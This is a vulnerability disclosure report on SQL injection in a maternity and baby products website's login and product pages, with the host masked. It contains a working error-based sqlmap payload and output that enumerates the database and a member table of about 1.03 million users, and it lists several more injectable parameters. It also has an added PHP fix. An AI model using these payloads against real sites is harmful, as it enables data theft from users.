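2015-12-19: Details reported to the vendor; awaiting vendor handling
2015-12-23: Vendor confirmed; details disclosed only to the vendor
2016-01-02: Details disclosed to core white hats and experts in related fields
2016-01-12: Details disclosed to regular white hats
2016-01-22: Details disclosed to intern white hats
2016-02-06: Details disclosed to the public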
SQL injection in the member login!
Has this one already been submitted, I wonder? Injection points:
http://**.**.**.**/about/express.php?year=-1 (GET)
http://**.**.**.**/login.php (POST)
txtLoginName=1&txtLoginPwd=2&goClcik=
The txtLoginPwd parameter is injectable.
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtLoginPwd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: txtLoginName=1&txtLoginPwd=2' AND (SELECT 3570 FROM(SELECT COUNT(*),CONCAT(0x7176716e71,(SELECT (CASE WHEN (3570=3570) THEN 1 ELSE 0 END)),0x7178716971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eNiX'='eNiX&goClcik=
---
[13:55:40] [INFO] testing MySQL
[13:55:40] [INFO] confirming MySQL
[13:55:41] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2, PHP 5.5.19
back-end DBMS: MySQL >= 5.0.0
[13:55:41] [INFO] fetching current user
[13:55:41] [INFO] resumed: wwwscient_scient@localhost
current user: 'wwwscient_scient@localhost'
[13:55:41] [INFO] fetching current database
[13:55:41] [INFO] resumed: wwwscient_scient
current database: 'wwwscient_scient'
[13:55:41] [INFO] testing if current user is DBA
[13:55:41] [INFO] fetching current user
current user is DBA: False
available databases [2]:
[*] information_schema
[*] wwwscient_scient
Database: wwwscient_scient
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| member2013       | 1033281 |
| mononlining      | 9395    |
| dzhufu           | 549     |
| tn_sys_lang      | 427     |
| news             | 290     |
| babylife         | 192     |
| dnews            | 154     |
| db_photo         | 59      |
| products_quality | 51      |
| paperinfo        | 41      |
| menu             | 36      |
| dchina           | 32      |
| products         | 32      |
| babyedu          | 31      |
| aboutus          | 28      |
| assessment       | 28      |
| paperban         | 27      |
| babylifetype     | 26      |
| db_prov          | 23      |
| mononline        | 23      |
| mominfo          | 22      |
| tn_news          | 20      |
| abouttype        | 15      |
| tn_sys_pic       | 14      |
| tn_sys_plus      | 10      |
| manageuser       | 9       |
| roles            | 9       |
| momspeak         | 8       |
| paperyeas        | 8       |
| dclass           | 7       |
| usereport        | 7       |
| mononlinetype    | 6       |
| producttype      | 6       |
| tn_sys_var       | 6       |
| productage       | 5       |
| activities       | 4       |
| babyedutype      | 4       |
| mominfotype      | 3       |
| tn_award         | 3       |
| tn_user          | 2       |
| db_admin         | 1       |
| newstype         | 1       |
| tn_serialnum     | 1       |
| tn_sys_admin     | 1       |
+------------------+---------+
1.03 million users
Injection point 1:
http://**.**.**.**/product/product.php?id=4&ProductTypeID=4
The id parameter here is injectable.
Injection point 2:
http://**.**.**.**/product/product-index.php?ProductTypeID=4
The ProductTypeID parameter on this page is injectable.
Injection point 3:
http://**.**.**.**/product/product-index.php?ProductAgeID=1
The ProductAgeID parameter is injectable.
Injection point 4:
http://**.**.**.**/baby-center/baby-edu.php?BabyEduTypeID=1
The BabyEduTypeID parameter is injectable.
Injection point 5:
http://**.**.**.**/baby-center/baby-edu.php?ID=1&BabyEduTypeID=1
Both ID and BabyEduTypeID are injectable.
Injection point 6:
http://**.**.**.**/baby-center/baby-life.php?ID=1&&type=0
The ID parameter is injectable.
Injection point 7:
http://**.**.**.**/baby-center/assessment.php?sexName=男&&sexValue=1&&Month=5
The Month parameter is injectable.
1.03 million users. No need to say more, you get the idea!
Fix by filtering the input.
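What that fix can look like in PHP, as an added example that is not part of the original report and not the vendor's code: the login name is bound as a query parameter, database errors stay in the server log, and the numeric GET parameters are validated as integers. The in-memory SQLite database, the member table, its column names and the sample account are constructed assumptions standing in for the site's MySQL schema.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the site's MySQL database: in-memory SQLite with a
// hypothetical table, hypothetical column names and one made-up account.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE member (login_name TEXT PRIMARY KEY, pwd_hash TEXT NOT NULL)');
$pdo->prepare('INSERT INTO member (login_name, pwd_hash) VALUES (?, ?)')
    ->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]);

// txtLoginName is sent as a bound parameter; txtLoginPwd never becomes SQL text,
// it is only compared with the stored hash inside PHP.
function checkLogin(PDO $pdo, string $name, string $pwd): bool
{
    try {
        $stmt = $pdo->prepare('SELECT pwd_hash FROM member WHERE login_name = ?');
        $stmt->execute([$name]);
        $hash = $stmt->fetchColumn();
        return is_string($hash) && password_verify($pwd, $hash);
    } catch (PDOException $e) {
        // Error-based extraction depends on DBMS error text reaching the client:
        // log it server-side and answer with a plain failure.
        error_log('login query failed: ' . $e->getMessage());
        return false;
    }
}

// The numeric GET parameters (id, ID, ProductTypeID, ProductAgeID, BabyEduTypeID,
// Month) are accepted only as positive integers; anything else yields null.
function intParam(array $query, string $key): ?int
{
    $v = filter_var($query[$key] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    return $v === false ? null : $v;
}

// Constructed inputs: a valid login, quote-bearing values in each login field,
// a clean numeric parameter and one with trailing SQL.
var_dump(checkLogin($pdo, 'alice', 'correct horse'));
var_dump(checkLogin($pdo, 'alice', "2' AND 'a'='a"));
var_dump(checkLogin($pdo, "alice' --", 'x'));
var_dump(intParam(['id' => '4'], 'id'));
var_dump(intParam(['Month' => '5 AND 1=1'], 'Month'));
```

Only the first login succeeds and only id=4 passes validation. Against MySQL, also setting PDO::ATTR_EMULATE_PREPARES to false makes the driver use native prepared statements.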
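Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-12-23 20:07
CNVD did not directly reproduce the vulnerability as described and has not yet established a direct handling channel with the organization that operates the website; the report is awaiting a claimant.
None yet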